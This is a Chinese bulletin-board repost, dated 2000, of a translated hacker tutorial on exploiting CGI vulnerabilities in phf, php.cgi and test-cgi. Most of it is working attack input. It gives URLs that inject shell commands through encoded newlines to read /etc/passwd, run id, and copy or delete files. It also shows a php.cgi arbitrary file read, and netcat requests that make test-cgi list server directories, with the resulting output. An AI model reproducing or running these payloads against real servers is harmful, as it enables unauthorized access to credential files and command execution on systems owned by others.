发信人: iamu()
整理人: williamlong(2000-03-07 19:00:17), 站内信件
|
CGI漏洞的利用(一)
CGI漏洞向来是容易被人们忽视的问题,同时也是普遍存在的,前不久攻破P
CWEEK LINUX的黑客就是利用了CGI的一个漏洞。我就自己所知道的和从外国站点
看来的一些CGI漏洞来写一些利用CGI的攻击方法,水平有限写得不对的地方请来
信告诉我:[email protected]
一、phf.cgi攻击:
phf是大家所熟悉的了,它本来是用来更新PHONEBOOK的,但是许多管理员对
它不了解以至于造成了漏洞。在浏览器中输入:
http://thegnome.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
可以显示出PASSWD文档来。其实还可以用更好的命令来实现目的:
http://thegnome.com/cgi-bin/phf?%0aid&Qalias=&Qname=haqr&Qemail=&Qnick
na
me=&Qoffice_phone=
http://thegnome.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qnam
e=
haqr&Qemail=&Qnickname=&Qoffice_phone=
http://thegnome.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/pass
wd
%0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
http://thegnome.com/~someuser/passwd
http://thegnome.com/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&Qalias=&Qna
me
=haqr&Qemail=&Qnickname=&Qoffice_phone=
以上等于执行了命令:
id
ls -la ~someuser
cp /etc/passwd ~someuser/passwd
(用普通的可以进入的目录来看passwd)
rm ~someuser/passwd
二、php.cgi
除了PHF以外,php也是常见的漏洞,php.cgi 2.0beta10或更早版本中,允许
anyone以
HTTP管理员身份读系统文件,在浏览器中输入:
http://boogered.system.com/cgi-bin/php.cgi?/etc/passwd
就可以看到想看的文件。
另外,一部分php.cgi还可以执行shell,原因是它把8k bytes字节放入128b
ytes的缓冲区中,造成堆栈段溢出,使得攻击者可以以HTTP管理员的身份执行。
但是只有PHP作为CGI脚本时才能实现,而在作为Apache模量是不能运行的。
想检查能否运行,只要在浏览器中输入:
http://hostname/cgi-bin/php.cgi
如果你看到返回这样的字样就可以运行:
PHP/FI Version 2.0b10
...
三、test-cgi的问题
test-cgi同样是个常常出现的漏洞,在浏览器中输入:
http://thegnome.com/cgi-bin/test-cgi?\whatever
将会返回:
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = thegnome.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
再来一次,这样输入:
http://thegnome.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
看到PASSWD了?
用netcat 80 端口 进行攻击:
machine% echo "GET /cgi-bin/test-cgi?/*" | nc removed.name.com 80
返回:
CGI/1.0 test script report:
argc is 1. argv is /\*.
SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = removed.name.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt
/root /sbin /stand /sys /tmp /usr /usr2 /var
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
显示出了根目录!这样试试:
machine% echo "GET /cgi-bin/test-cgi?*" | nc removed.name.com 80
返回:
CGI/1.0 test script report:
argc is 1. argv is \*.
SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = removed.name.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = calendar cgi-archie cgi-calendar cgi-date cgi-finger
cgi-fortune cgi-lib.pl imagemap imagemap.cgi imagemap.conf index.html
mail-query mail-query-2 majordomo majordomo.cf marker.cgi
menu message.cgi munger.cgi munger.note ncsa-default.tar post-query
query smartlist.cf src subscribe.cf test-cgi uptime
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
显示了/CGI-BIN/目录下的东西。
———————————————————————————————————
———————
以上文章由darksun成员ISNO翻译,如转载请保持文章完整。http://isno.yeah.
net
--
=====================================================
黑客=安全??http://isno.yeah.net
=====================================================
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.99.62.155]
|
|